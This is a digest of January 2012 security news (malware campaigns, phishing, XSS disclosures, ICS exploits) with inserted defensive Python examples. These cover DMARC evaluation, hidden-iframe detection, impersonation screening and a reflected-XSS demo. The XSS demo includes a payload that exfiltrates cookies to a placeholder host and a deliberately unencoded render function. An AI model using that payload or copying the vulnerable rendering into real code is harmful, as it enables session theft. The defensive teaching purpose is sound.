Symantec declares pcAnywhere safe to use. Symantec announced its pcAnywhere software is now safe to use, with free upgrades offered to users, SC Magazine UK reported January 31. According to Reuters, the company determined the current version of pcAnywhere is safe, provided it has been updated with a security patch released January 23. A Symantec spokesman said it is offering free upgrades to pcAnywhere 12.5 to all customers, even those using old editions. He also said that while Symantec is advising all users to upgrade, they can safely continue using versions 12.0 and 12.1 if they download a second software patch released January 27. Symantec advised users the week of January 23 to disable pcAnywhere because they were at increased risk of being hacked after the software's source code was stolen. However, according to the chief security officer at Rapid7, more than 140,000 computers running pcAnywhere appear to remain configured to accept direct connections from the Internet, many of them point-of-sale machines, putting them at risk regardless of patch level: a remote-control service that does not need to be reachable from the Internet should be behind a firewall or VPN, not merely patched.
Virus-slingers abuse WordPress vulns, dose punters with exploit. Malware-spreaders are hacking into vulnerable WordPress-powered sites to drive traffic towards pages loaded with exploits, The Register reported January 31. Hundreds of Web sites based on WordPress 3.2.1 have been compromised so that surfers directed to the WordPress-built sites via e-mail links are exposed to the Phoenix exploit kit, M86 Security warned. To lure users to compromised pages, the attacker has spammed out thousands of malicious e-mails querying an unfamiliar bill and asking recipients to click on a link. The link points to a page on a compromised WordPress site (the sites appear legitimate to spam filters) that includes a hidden iframe, which loads the Phoenix exploit kit from a Russian-hosted server. Arriving at the page puts surfers in the firing line of code that attempts to exploit multiple vulnerabilities in Microsoft Internet Explorer, Adobe Reader (PDF), Flash, and Oracle Java. The attack is ultimately designed to distribute an information-harvesting Trojan, dubbed Cridex-B.
Facebook Valentine’s Day theme leads to Trojan. Trend Micro researchers came across a Valentine’s Day-themed Facebook scam that attempts to dupe victims into downloading a Trojan that then installs itself in the browser to help the crooks make money, Softpedia reported January 31. Facebook users who fall for the phony advertisement and click it are taken to a Web site that displays a large Install button. Once clicked, the page prompts the user to download a file called FacebookChrome.crx, identified by the security firm as Troj.Fookbace.A. Upon execution, the Trojan runs a script that can display ads from other sites and installs itself in the browser as an extension named Facebook Improvement. Once installed, the malicious extension monitors Web activity, redirects sessions to survey pages that request sensitive data, performs like-jacking attacks, and posts ill-intended messages on behalf of the victim. Experts believe these attacks are designed chiefly for Chrome users, but note they also work with Mozilla Firefox. Facebook members who use Internet Explorer are taken directly to the survey site because the extension does not work in that browser.
Cridex Trojan breaks CAPTCHA to create Yahoo! email accounts. Security experts found that a component of the ZeuS-like Cridex Trojan is able to defeat the security test for creating e-mail accounts, Softpedia reported January 30. Websense researchers came across a variant of Cridex, a banking Trojan, that not only infects computers to steal sensitive data from their owners but also creates Yahoo! e-mail accounts to spam others. This version of the malware spreads via e-mails containing a shortened link that points to the Blackhole exploit kit. If the exploit is successful, the Trojan is downloaded to the infected machine. If CAPTCHAs were strong, automated tools would have a hard time creating accounts, but experts showed that with just six attempts, this component breaks the test and creates a Yahoo! e-mail account without much difficulty. It does so by harvesting the CAPTCHA image and sending it in an HTTP POST request to a CAPTCHA-breaking server that returns the solution in JSON format; the CAPTCHA is thus not broken locally but outsourced, which is why its strength matters less than the account-creation rate limits behind it.
1/31/12
Technology firms create DMARC to fight phishing. A crackdown on “phishing” scams has been announced by 15 of the top technology companies. E-mail providers such as Google and Microsoft will work with companies like PayPal and Bank of America to improve e-mail authentication. The Domain-based Message Authentication, Reporting and Conformance (DMARC) coalition has released plans to produce a “feedback loop” between e-mail receivers and senders. DMARC builds on the existing SPF and DKIM mechanisms: a domain owner publishes a DNS record stating what receivers should do with mail that claims to come from the domain but fails authentication (monitor, quarantine, or reject) and where to send aggregate reports. The initiative is the first significant attempt to bring together e-mail and service providers along with key security organizations. DMARC said this industry-wide involvement, which covers the receivers, senders, and intermediaries of e-mail, will mean e-mail providers will for the first time be able to reliably filter out unwanted e-mails, rather than use “complex and imperfect measurements” to determine threats.
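The following is an added example, written for this page and not code from DMARC.org or any of the providers named, showing how a receiver evaluates one message against a published DMARC policy. The DMARC record, the organizational-domain shortcut (last two labels, which is wrong for domains like example.co.uk; real receivers consult the Public Suffix List), and the SPF/DKIM results are all constructed assumptions.

```python
"""Added example: evaluate a message against a DMARC policy.

Illustrative code for this page, not DMARC.org's or any provider's
implementation. The record and authentication results are constructed.
"""
from dataclasses import dataclass

# Constructed DMARC TXT record as it would be published at _dmarc.example.com
DMARC_RECORD = "v=DMARC1; p=reject; adkim=s; aspf=r; rua=mailto:dmarc-reports@example.com"


def parse_dmarc(record: str) -> dict:
    """Parse 'tag=value; tag=value' into a dict, applying DMARC defaults
    (relaxed alignment for both identifiers, policy applied to 100%)."""
    tags = {"adkim": "r", "aspf": "r", "pct": "100"}
    for part in record.split(";"):
        part = part.strip()
        if not part or "=" not in part:
            continue
        key, value = part.split("=", 1)
        tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1" or "p" not in tags:
        raise ValueError("not a valid DMARC record")
    return tags


def org_domain(domain: str) -> str:
    """Organizational domain. ASSUMPTION: last two labels; a real receiver
    uses the Public Suffix List so that example.co.uk is handled correctly."""
    labels = domain.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def aligned(auth_domain: str, from_domain: str, mode: str) -> bool:
    """DMARC identifier alignment: strict ('s') requires an exact match,
    relaxed ('r') requires the same organizational domain."""
    a, f = auth_domain.lower(), from_domain.lower()
    if mode == "s":
        return a == f
    return org_domain(a) == org_domain(f)


@dataclass
class AuthResult:
    from_domain: str   # RFC5322.From domain the user sees
    spf_pass: bool
    spf_domain: str    # envelope MAIL FROM domain SPF was checked against
    dkim_pass: bool
    dkim_domain: str   # d= of a DKIM signature that verified


def dmarc_verdict(record: str, r: AuthResult) -> str:
    """Return 'pass' or the policy action ('none', 'quarantine', 'reject').
    DMARC passes if EITHER SPF or DKIM passes AND is aligned with From."""
    tags = parse_dmarc(record)
    spf_ok = r.spf_pass and aligned(r.spf_domain, r.from_domain, tags["aspf"])
    dkim_ok = r.dkim_pass and aligned(r.dkim_domain, r.from_domain, tags["adkim"])
    return "pass" if (spf_ok or dkim_ok) else tags["p"]


if __name__ == "__main__":
    legit = AuthResult("example.com", True, "bounce.example.com", True, "example.com")
    spoof = AuthResult("example.com", True, "attacker.example", False, "")
    print(dmarc_verdict(DMARC_RECORD, legit))  # pass
    print(dmarc_verdict(DMARC_RECORD, spoof))  # reject
```

Note what the spoofed message shows: the attacker's own SPF passes for attacker.example, but that domain is not aligned with the From: domain the recipient sees, so the message still fails DMARC. That alignment check is what plain SPF and DKIM lacked.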
New drive-by spam infects those who open email, no attachment needed. Attackers have developed a new way to infect a user’s PC through e-mail. According to researchers at eleven, a German security firm, the new drive-by spam automatically downloads malware when an e-mail is opened in the e-mail client. The user does not have to click on a link or open an attachment; just opening the e-mail is enough. The current wave of drive-by spam carries the subject “Banking security update” and a sender address in the fdic.com domain. If the e-mail client renders HTML e-mail, the embedded HTML is activated immediately on display, pulling the exploit page in the same way a hidden iframe on a compromised Web site does. Configuring the mail client to display messages as plain text, or at least not to load remote content automatically, removes this trigger.
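Both the drive-by spam above and the compromised-WordPress and fake-scanner campaigns elsewhere on this page rely on the same mechanism: a hidden iframe or remote script that pulls an exploit kit page when HTML is rendered. The following added example, written for this page and not tooling from eleven, M86 or Websense, flags the usual tells (tiny or style-hidden iframes, scripts fetched from a raw IP address) in an HTML document or the text/html part of a message. The sample HTML and the address 203.0.113.7 in it are constructed.

```python
"""Added example: flag hidden iframes and raw-IP script loads in HTML.

Illustrative code for this page, not any vendor's product. The sample
page is constructed; 203.0.113.7 is a documentation-range placeholder.
"""
import re
from html.parser import HTMLParser

# Constructed sample: an invoice-themed page with an injected 1x1 iframe
SAMPLE_HTML = """
<html><body>
<h1>Invoice #4471</h1>
<p>Please review the attached statement.</p>
<iframe src="http://203.0.113.7/kit/index.php" width="1" height="1"
        style="visibility:hidden"></iframe>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<script src="http://203.0.113.7/x.js"></script>
</body></html>
"""

# Inline styles commonly used to keep an injected frame off-screen
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:left|top)\s*:\s*-\d{3,}", re.I)
RAW_IP_URL = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}(?:[:/]|$)", re.I)


def _dimension(value):
    """Parse '1', '1px' or '100%' into an int; None if not numeric."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


class SuspiciousTagFinder(HTMLParser):
    """Collects (tag, src, reason) for iframes/scripts that look injected."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe":
            w, h = _dimension(a.get("width")), _dimension(a.get("height"))
            reasons = []
            if (w is not None and w <= 2) or (h is not None and h <= 2):
                reasons.append("tiny size")
            if HIDDEN_STYLE.search(a.get("style") or ""):
                reasons.append("hidden by style")
            if reasons:
                self.findings.append(("iframe", a.get("src", ""), ", ".join(reasons)))
        elif tag == "script" and a.get("src") and RAW_IP_URL.match(a["src"]):
            self.findings.append(("script", a["src"], "loaded from raw IP"))


def find_suspicious(html: str):
    """Return a list of (tag, src, reason) tuples for the given HTML."""
    parser = SuspiciousTagFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_HTML):
        print(finding)
```

The visible YouTube embed is not reported, only the 1x1 hidden frame and the script fetched from a bare IP. Treat the output as triage input, not a verdict: legitimate analytics tags are sometimes 1x1 frames, and the same scan should be run over every text/html MIME part of a suspect message, not just the body of a page.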
Drive-by-download attack exploits critical vulnerability in Windows Media Player. Security researchers from antivirus vendor Trend Micro have come across a Web-based attack that exploits a known vulnerability in Windows Media Player, a threat response engineer said in a blog post January 26. The security flaw can be exploited by tricking the victim into opening a specially crafted MIDI (Musical Instrument Digital Interface) file in Windows Media Player. Microsoft released a security fix for it January 10, as part of its monthly patch cycle. If successful, the exploit downloads and executes a computer Trojan on the targeted system, which Trend Micro detects as TROJ_DLOAD.QYUA. “[So] far we’ve been seeing some serious payload, including rootkit capabilities,” the Trend Micro engineer said. The attack is not widespread at the moment, but it is possible other attackers will start exploiting the same vulnerability in the near future, a senior antivirus researcher said.
Massive Android malware op may have infected 5 million users. The largest-ever Android malware campaign may have duped as many as 5 million users into downloading infected apps from Google’s Android Market, Symantec said January 27. Dubbed “Android.Counterclank” by Symantec, the malware was packaged in 13 different apps from three different publishers, with titles ranging from “Sexy Girls Puzzle” to “Counter Strike Ground Force.” “They don’t appear to be real publishers,” a director with Symantec’s security response team said in an interview. “These aren’t rebundled apps, as we’ve seen so many times before.” Symantec estimated the impact by combining the download totals of the 13 apps, arriving at a figure between 1 million on the low end and 5 million on the high. When installed on an Android smartphone, Android.Counterclank collects a wide range of information, including copies of the bookmarks and the handset maker. It also modifies the browser’s home page.
01/30/12
Facebook scammers leverage the Amazon Cloud. Recently, spammers began using Amazon’s cloud services to host fake Facebook pages leading to surveys, because it is cheap and because Facebook is less likely to block links to an Amazon domain. Users are usually reeled in with offers to see a funny/amazing/shocking video and click on the offered URL (often a shortened one). In a recently spotted scam, users who click the link are taken to a fake Facebook page where those who use Chrome or Firefox are asked to install a fake YouTube plug-in to view the video. The offered plug-in is not what it claims to be. “Upon installing the plugin, a redirector URL is generated by randomly selecting from the usernames, mo1tor to mo15tor, in the Amazon web service,” explain F-Secure researchers. “Then, the link generated is shortened through bitly.com via the use of any of the 5 hardcoded userID and API key-pairs. These key-pairs give a spammer the ability to auto-generate bit.ly URLs for the Amazon web service link. This ultimately leads to a redirection to the fake Facebook page.” These users are therefore responsible for propagating the scam further by unknowingly posting the scam message on their Facebook profiles, and are not asked to fill out surveys. Users of other browsers are spared from inadvertently spamming their friends but are redirected to surveys provided by affiliate marketers.
Unwanted apps on Android smartphones. Third-party Android markets have always been the favorite means of malicious app dissemination, especially in regions where users do not have access to the official repository. This is also the case with the latest campaign, in which cyber criminals lure users into installing well-known applications from the genuine Android Market that have been tampered with to launch additional services along with the original app. Simply put, the application downloaded from a third-party market contains the legitimate app as well as a trojanized service (usually called “GoogleServicesFrameworkService”), which is launched with the host application. Identified by Bitdefender as Android.Trojan.FakeUpdates.A, this piece of malware connects to a command and control server and fetches a list of links to different Android application packages (APKs). It then downloads each APK from the list and displays a notification in the status bar reading “In order to have access to the latest updates, click Install.” This confuses the user, who does not know where the message came from. The Trojan requests an extensive array of permissions at install time to make sure it can take full control of the smartphone whenever necessary; depending on the APKs to be downloaded and installed, it may require up to 10 permissions before installation. Most users will accept without a second thought, since they believe what is being installed is an update to an application they already have. Trojanized applications on third-party Android markets are not new; what is particularly important is the attackers’ modus operandi: they publish a legitimate application on the market, let it live for several days to collect positive ratings and gain users’ trust, and then swap the APK for a trojanized one. Reviewing the permission list of an "update" against what the original app needed is the one check a user can still make at that point.
Most of the repackaged applications analyzed have low detection rates, which poses a danger even to smartphone users who run a mobile security solution. Android.Trojan.FakeUpdates.A poses a threat to the smartphone user as it can download and install anything, from trial versions of software in pay-per-install campaigns to spyware and other Trojans.
Attackers targeting Windows Media bug with malware. Security researchers saw attackers going after the newly patched CVE-2012-0003 vulnerability in Windows Media Player. The flaw, which Microsoft patched earlier in January, is a critical one that enables remote code execution and affects a wide range of Windows systems. When the patch was released, Microsoft officials recommended customers install it immediately because there was a decent chance of attackers leveraging it in the near future, which is exactly what happened. Researchers at IBM ISS X-Force saw attacks against the MIDI vulnerability in the wild in recent days and said that, because exploitation of the flaw is not considered difficult, more may well be on the horizon. To exploit this vulnerability, an attacker must entice a user into opening a specially formatted media file. Once the exploit code executes, the attacker has full control of the system. Pieces of malware capable of exploiting this vulnerability are now circulating online. The specific attack Trend Micro’s researchers analyzed uses the shellcode to download an encrypted binary, which it then decrypts and executes. The payload includes malware with rootkit capabilities, which is installed on the victim’s machine; the rootkit then connects to a remote server and downloads another component, a backdoor.
01/27/12
Symantec advises users to turn off pcAnywhere in hack aftermath. Symantec has advised customers to take their copies of pcAnywhere offline as the company continues to struggle with the aftermath of a major data breach. The company issued a whitepaper addressing new vulnerabilities in its remote access tool that were exploited by a recently publicized attack which allowed attackers to gain access to the application’s source code. The 2006 hack was recently brought to light by an Indian hacking team that is seeking to publicly distribute the code. Symantec has now determined a major update is necessary to protect users from any flaws revealed in the compromised source code. The company is advising users of pcAnywhere 12.5 to disable the remote management tool until an update is released. If users do not take their copies of the tool offline, the company warned attackers could possibly compromise systems and perform “man-in-the-middle” attacks that could result in the theft of user credentials and other network traffic.
Amateur programmer: SMS spoofing for malicious purposes is easy. SMS spoofing is not new; researchers proved in 2010, for BBC’s Watchdog, that it could be done. While most telecommunications companies are aware of the risks, few have actually done anything to prevent it. Now an amateur programmer has come forward with a simple app to prove that SMS spoofing for malicious purposes is widely available and that, if measures are not taken, many individuals may be exposed to cybercriminal operations. A self-described “completely amateur programmer” with less than 2 years’ experience managed to develop a simple program that could allow anyone to launch social engineering attacks aimed at obtaining valuable information and maybe even money. The practical consequence is that the sender shown on a text message is no more trustworthy than the From: line of an e-mail; a bank or customer should not act on an SMS alone.
01/26/12
Super-powered ‘frankenmalware’ strains detected in the wild. Viruses are accidentally infecting worms on victims’ computers, creating super-powered strains of hybrid software nasties. The monster malware spreads quicker than before, screws up systems worse than ever, and exposes private data in a way not even envisioned by the original virus writers. A study by antivirus outfit BitDefender found 40,000 such “Frankenmalware samples” in a study of 10 million infected files in early January, or 0.4 percent of malware strains sampled. These cybercrime chimeras pose a greater risk to infected users than standard malware, the antivirus firm warns. “If you get one of these hybrids on your system, you could be facing financial troubles, computer problems, identity theft, and a wave of spam thrown in as a random bonus,” said the BitDefender analyst who carried out the study. “The advent of malware sandwiches throws a new twist into the world of malware. They spread more efficiently, and will become increasingly difficult to predict.” BitDefender does not have historical data to go on. Even so, it posits that frankenmalware is likely to grow at the same rate as regular computer viruses, or about 17 percent per year. All of the malware hybrids analyzed by BitDefender so far have been created accidentally. However, the risk posed by these combinations could increase dramatically as criminals latch onto the idea.
Fraud alert involving e-mail intrusions to facilitate wire transfers overseas. The FBI has observed a trend in which cyber criminals compromise the e-mail accounts of U.S. individuals and businesses, or register variations of the legitimate e-mail addresses associated with the victim accounts, and use them to request and authorize overseas transactions, according to a January 20 alert. The wire transfers are sent to bank accounts of individuals typically located in the United States or Australia, and the funds are then forwarded to Malaysia. Investigations found some of the money mules in the United States and Australia are themselves victims of a romance scam and are asked to transfer the funds on to Malaysia. As of December 2011, the attempted fraud amounted to about $23 million, with actual victim losses of about $6 million. This type of fraud has affected banks, broker/dealers, credit unions, and other institutions. In a typical scenario, the cyber criminal sends an e-mail to a financial institution, brokerage firm employee, or the victim’s financial adviser pretending to be the victim and requests the balance of the victim’s account. When the request succeeds, the cyber criminal sends another e-mail explaining why they can only communicate via e-mail and asks that a wire transfer be initiated on their behalf. The excuse is typically an illness or death in the family that prevents the account holder from conducting business as usual. Because the request arrives from an address that looks right, the control that stops it is procedural: a wire instruction received by e-mail is confirmed by calling the customer back on a number already on file, never one supplied in the e-mail.
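The "variations of the legitimate e-mail address" the alert describes are catchable on the receiving side. The following is an added example, written for this page and not the FBI's or any institution's system, that screens an incoming request against the addresses on file for a customer and flags near-miss domains, reuse of the customer's name from free-mail providers, and display-name-only matches. The trusted address list, the incoming samples, and the similarity threshold are constructed assumptions; a compromised genuine account, the other case in the alert, cannot be caught this way and still needs the call-back.

```python
"""Added example: flag sender addresses that imitate a known customer.

Illustrative code for this page, not any bank's screening system.
Trusted addresses, incoming samples and the 0.85 threshold are assumptions.
"""
import re
from difflib import SequenceMatcher

# Constructed: addresses on file for one account holder
TRUSTED = ["jane.doe@example.com"]

# Constructed incoming requests: (display name, address)
INCOMING = [
    ("Jane Doe", "jane.doe@example.com"),        # genuine
    ("Jane Doe", "jane.doe@examp1e.com"),        # digit 1 for letter l
    ("Jane Doe", "jane.doe@example.co"),         # dropped last letter of TLD
    ("Jane Doe", "janedoe.example@gmail.com"),   # name reused on free mail
    ("Jane Doe", "jdoe@exampleinc.net"),         # only the display name matches
]

FREEMAIL = {"gmail.com", "yahoo.com", "hotmail.com", "outlook.com"}
DOMAIN_SIMILARITY_THRESHOLD = 0.85   # assumption: tune against real traffic


def split_address(addr: str):
    local, _, domain = addr.lower().partition("@")
    return local, domain


def similarity(a: str, b: str) -> float:
    """0..1 ratio from difflib; 1.0 means identical."""
    return SequenceMatcher(None, a, b).ratio()


def name_tokens(text: str):
    return set(re.findall(r"[a-z]+", text.lower()))


def classify(display_name: str, addr: str, trusted=TRUSTED) -> str:
    """Return 'trusted', 'lookalike', 'freemail-impersonation',
    'display-name-match' or 'unknown'."""
    if addr.lower() in {t.lower() for t in trusted}:
        return "trusted"
    local, domain = split_address(addr)
    for t in trusted:
        t_local, t_domain = split_address(t)
        # Same local part, domain one edit away: the classic registered lookalike
        if local == t_local and similarity(domain, t_domain) >= DOMAIN_SIMILARITY_THRESHOLD:
            return "lookalike"
        # Customer's name reused in a free-mail account
        if domain in FREEMAIL and name_tokens(display_name) & name_tokens(t_local):
            return "freemail-impersonation"
        # Display name matches the customer but the address does not
        if name_tokens(display_name) & name_tokens(t_local):
            return "display-name-match"
    return "unknown"


def screen(incoming=INCOMING):
    """Classify every (display name, address) pair; anything but 'trusted'
    should route the request to a manual call-back."""
    return [(addr, classify(name, addr)) for name, addr in incoming]


if __name__ == "__main__":
    for addr, verdict in screen():
        print(f"{verdict:24} {addr}")
```

The ordering of the checks matters: a lookalike domain is tested before the weaker display-name rule so that the most specific finding is reported. Anything other than "trusted" is a reason to stop and phone the customer on the number on file, not a reason to reply to the e-mail.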
Hackers prove EA, IGN, ImageShack, NY Times, and Verizon vulnerable. A new hacking collective, TeamHav0k, launched an operation called “#OP XSS” in which they look for cross-site scripting (XSS) vulnerabilities in major Web sites. The first results of the operation reveal that many important sites contain XSS flaws. A Pastebin document lists Web sites belonging to Verizon, Huffington Post, the European Organization for Nuclear Research, Electronic Arts (EA), IGN, and the New York Times as affected. Some educational institutions were also found to have XSS holes, including the University of Illinois, Harvard, Yale, and Rockefeller University. Telecoms company Verizon, media hosting company ImageShack, value calculator and traffic estimator tool StatShow, Major League Gaming, and Dr. Pepper complete the list. Even though XSS vulnerabilities are among the most common ones found in commercial Web sites, that does not mean they are not dangerous. Cybercriminals can rely on these weaknesses to execute their own script in the context of a trusted site, stealing sessions or rewriting pages for unsuspecting Internet users; the root cause in almost every case is user-supplied input written into a page without encoding for the context it lands in.
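As an added example, not code from any of the sites listed, the following shows the reflected-XSS defect in its simplest form and the hardened rendering beside it: the same search term written into a text node, an attribute value and a URL, each encoded for its own context. The page fragment, the payload and the address 203.0.113.7 are constructed.

```python
"""Added example: reflected XSS, vulnerable and hardened rendering.

Illustrative code for this page, not from any site named above. The
fragment and payload are constructed; 203.0.113.7 is a placeholder.
"""
from html import escape
from urllib.parse import quote

# Constructed payload: closes the attribute, then exfiltrates the cookie
PAYLOAD = '"><script>document.location="http://203.0.113.7/?c="+document.cookie</script>'


def render_vulnerable(query: str) -> str:
    """The bug: the query is concatenated into HTML unencoded, in a text
    node and inside an attribute value. A '">' in the input ends the
    attribute and the rest is interpreted as markup."""
    return (f'<p>Results for {query}</p>'
            f'<input type="text" name="q" value="{query}">')


def render_hardened(query: str) -> str:
    """Encode for each context: html.escape (quote=True by default) turns
    <, >, &, " and ' into entities for text and attribute contexts;
    urllib.parse.quote percent-encodes the value for a URL component."""
    return (f'<p>Results for {escape(query)}</p>'
            f'<input type="text" name="q" value="{escape(query)}">'
            f'<a href="/search?q={quote(query, safe="")}">permalink</a>')


def contains_script_tag(html: str) -> bool:
    """Crude marker used only to contrast the two renderings."""
    return "<script" in html.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))   # script tag survives intact
    print(render_hardened(PAYLOAD))     # rendered as harmless text
```

Output encoding is the fix, not input filtering: a blacklist of "<script" would miss an event-handler attribute or a javascript: URL. Note also that neither function is safe for a value placed inside an existing <script> block or an inline event handler; those contexts need JavaScript-string encoding, and a Content-Security-Policy header that disallows inline script limits the damage when an encoding is missed.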
Researcher traces ‘Gameover’ malware to maker of Zeus. The “Gameover” malware that the FBI warned users about earlier in January 2012 is a preview of the next version of the even-more-notorious Zeus money-stealing trojan, a security researcher said January 23. “Gameover represents the latest and greatest source code package from the Zeus author,” a senior security researcher with Dell SecureWorks’ counter-threat unit said. “[New features] in Gameover will be rolled into the final Zeus version 3, which is in beta and will wrap up soon if it hasn’t already.” Two weeks ago, the FBI warned of increased action by Gameover, including rounds of spam that tried to dupe recipients into infecting their PCs with the malware, which like Zeus, is designed to pillage individuals’ and companies’ bank accounts. The security researcher, who has been tracking the Zeus malware and its developer for years, said Gameover posed a new and more dangerous threat because it had been created by the maker of Zeus specifically at the behest of one of his biggest clients. “The crew using Gameover has requested a lot of changes in the Zeus functionality,” he said, adding the hacker crew using Gameover has direct access to Zeus’ maker because it pays him well and often for support. “The Zeus author now has only three or four major clients,” he said. The criminal coder abandoned all his “small fish” to focus on supporting a handful of customers who pay top dollar for his work. The additions demanded by the Gameover gang, which the Zeus developer quickly created, included a new, more distributed form of command-and-control (C&C) that uses a peer-to-peer function to update infected machines when or if a botnet’s single C&C server is discovered by authorities and taken offline. Gameover also supports the use of complex Web injections that allow criminals to bypass multi-factor authentication now used by many financial institutions to stymie account plundering. 
And the crew apparently asked for changes to Zeus that would let the gang rent third-party botnets that specialize in conducting distributed denial-of-service (DDoS) attacks, the researcher added.
I spy your company’s boardroom. Researchers from Rapid7 discovered they could remotely infiltrate conference rooms in some of the top venture capital and law firms across the country, as well as pharmaceutical and oil companies and even the boardroom of Goldman Sachs — all by calling in to unsecured videoconferencing systems they found by doing a scan of the Internet. One of the researchers found he was able to listen in on meetings, remotely steer a camera around rooms, as well as zoom in on items to discern paint flecks on a wall or read proprietary information on documents. Despite the fact the most expensive systems offer encryption, password protection, and the ability to lock down the movement of cameras, the researchers found administrators were setting them up outside firewalls and failing to configure security features to keep out intruders. Some systems, for example, were set up to automatically accept inbound calls so users did not need to press an “accept” button when a caller dialed into a videoconference, opening the way for anyone to call in and eavesdrop. Using a program the researchers wrote, they found the conference rooms by scanning the Internet for videoconference systems set up outside firewalls and configured to automatically answer calls. In less than 2 hours, they found systems installed in 5,000 conference rooms, including an attorney-inmate meeting room at a prison, an operating room at a university medical center, and a venture capital company where prospects were pitching their companies while laying out their financial details on a screen in the room. Companies sometimes set up systems outside firewalls so other companies can easily call into the videoconferencing system without having to set up complex, but safer configurations. As a result, the researchers found they could easily hijack systems, and also access systems they otherwise could not find through an Internet scan.
01/23/12
Hoping to teach a lesson, researchers release exploits for critical infrastructure software. A group of researchers discovered serious security holes in six top industrial control systems used in critical infrastructure and manufacturing facilities and, thanks to exploit modules they released January 19, have also made it easy for hackers to attack the systems before they are patched or taken offline. The vulnerabilities were found in widely used programmable logic controllers (PLCs) made by General Electric, Rockwell Automation, Schneider Modicon, Koyo Electronics, and Schweitzer Engineering Laboratories. PLCs are used in industrial control systems to control functions in critical infrastructure such as water, power, and chemical plants; gas pipelines and nuclear facilities; as well as in manufacturing facilities such as food processing plants and automobile and aircraft assembly lines. The vulnerabilities, which vary among the products examined, include backdoors, lack of authentication and encryption, and weak password storage that would allow attackers to gain access to the systems. The security weaknesses also make it possible to send malicious commands to the devices to crash or halt them, and to interfere with specific critical processes controlled by them, such as the opening and closing of valves. As part of the project, the researchers worked with Rapid7 to release Metasploit exploit modules to attack some of the vulnerabilities. Metasploit is a tool used by computer security professionals to test if their networks contain specific vulnerabilities. Hackers also use the same exploit tool to find and gain access to vulnerable systems.
01/20/12
Bogus Western Union notice leads to phishing. A fake Western Union notice is hitting inboxes around the world and scaring people into following the offered link to a phishing page, Help Net Security reported January 18. “Failure in updating your profile will result in limiting your account access,” the spam e-mail says, signed by an “IT Assistant.” Users who fall for the trick are taken to a log-in page mimicking the Western Union one. Once they have entered the log-in credentials and pressed the “Sign In” button, they are asked to share information such as date of birth and answers to typical security questions such as their mother’s maiden name or favorite pet’s name. According to Hoax-Slayer: “Once they have this information, the scammers can then login to the victim’s real Western Union account and use it for nefarious purposes such as money laundering. The scammers may be able to use the stolen ‘Test Question’ details to collect payments without having the user’s proper identification documents.” Once the victims have done all that has been asked of them, they are redirected to the legitimate Western Union page.
Scanned documents from Xerox devices hide Blackhole exploit kit. The technique in which cybercriminals send e-mails pretending to come from a scanner inside an office building has been seen again, targeting the e-mail accounts of company staff. This time, an e-mail bearing the subject “Re: Scan from a Xerox W. Pro #XXXXXXX” informs the recipient that a document was sent to her from a Xerox device, Websense reports. Confused users, who may not know an employee named MAMIE who supposedly sent the e-mail, might rush to click on the link that allegedly points to five image files. Instead, the link redirects the user to a Web site hosting the Blackhole exploit kit. Hidden in an iframe, the kit probes for vulnerable software and, once it finds some, runs shellcode that downloads and executes further malware. More than 3,000 of these messages have been discovered so far, and since this variant of the Blackhole kit is more advanced, allowing cybercriminals to tweak the malware, the number may increase. Blackhole is typically rented out, and this latest version offers many improvements, such as administration options for smartphones and an option for the kit to use underground audio and video scanners for malware.
McAfee to plug ‘spammer’ hole this week. McAfee plans to release a fix soon for a bug in its SaaS for Total Protection anti-malware service that scammers were using to distribute spam, the company said January 18. The problem came to light after McAfee customers reported in blog posts and forum sites that spammers were using a hole in McAfee’s RumorServer relay service to secretly send spam from their machines. The customers said they noticed the problem after their e-mails were blocked by e-mail providers and their IP addresses appeared on blacklists. The problem is isolated to the SaaS Total Protection service, according to the director of security research at McAfee Labs. There is no evidence that any customer data has been lost or compromised as a result of the problem, he said. “The patch will be released on January 18 or 19, as soon as we have finished testing,” he wrote. “Because this is a managed product, all affected customers will automatically receive the patch when it is released.” There are two issues with the software. One vulnerability could allow an attacker to misuse an ActiveX control to execute code on the victim’s computer. The second, which is the issue the customers complained about, allows an attacker to misuse the “open relay” functionality in the software.
01/19/12
New stealthy botnet Trojan holds Facebook users hostage. A new strain of cybercrime trojan is targeting Facebook users by taking over their machines and shaking them down for cash, The Register reported January 18. Carberp, like its predecessors Zeus and SpyEye, infects machines by tricking users into opening PDFs and Excel documents loaded with malicious code, or attacks computers in drive-by downloads. The hidden malware is designed to steal account information and harvest credentials for e-mail and social-networking sites. A new configuration of the Carberp trojan targets Facebook users to ultimately steal e-cash vouchers. Previous malware attacks on Facebook have been designed purely to steal log-in info, so this latest trojan, spotted by security firm Trusteer, can be considered an escalation. The Carberp variant replaces any Facebook page the user navigates to with a fake page notifying the victim their Facebook account is temporarily locked. The page asks the mark for their first name, last name, e-mail, date of birth, password, and a Ukash 20 euro ($25) voucher number to verify their identity and unlock the account. The use of anti-debugging and rootkit techniques make Carberp trojan difficult to detect, warns security consultancy Context Information Security. Context said: “Carberp is also part of a botnet that can take full control over infected hosts, while its complicated infection mechanisms and extensive functionality make it a prime candidate for more targeted attacks.” Context adds Carberp, which creates a backdoor on infected machines, can be controlled from a central administrator control panel, allowing botnet herders to more easily mine stolen data. Trusteer said it has reported the attack to Facebook.
Facebook ‘free mobile recharge’ scam hijacks accounts. A phishing and survey scam rolled into one is currently targeting Facebook users, hijacking their accounts and making it difficult for the victims to get them back, warns a McAfee researcher. The victims are lured with messages seemingly posted by friends claiming they received a “100rs free recharge.” Following the offered link, users reach a page asking them to enter their Facebook log-in credentials to receive it. Once the account details are entered and the “Log In” button is pressed, the page redirects users to a page mimicking a Facebook one, which asks the user to complete a survey to unlock the recharge option. In the background, the page sends the recorded log-in credentials — in clear text via an HTTP POST request — to a remote server operated by the scammers. The scammers then use the credentials to access the victims’ Facebook accounts, change the information in them (including the password and the e-mail address), and post the same message that lured in the victims in the first place. The affected users are unable to immediately do anything about it. “Even if the victims try to reset their passwords, they will never get the password reset email from Facebook,” said the researcher.
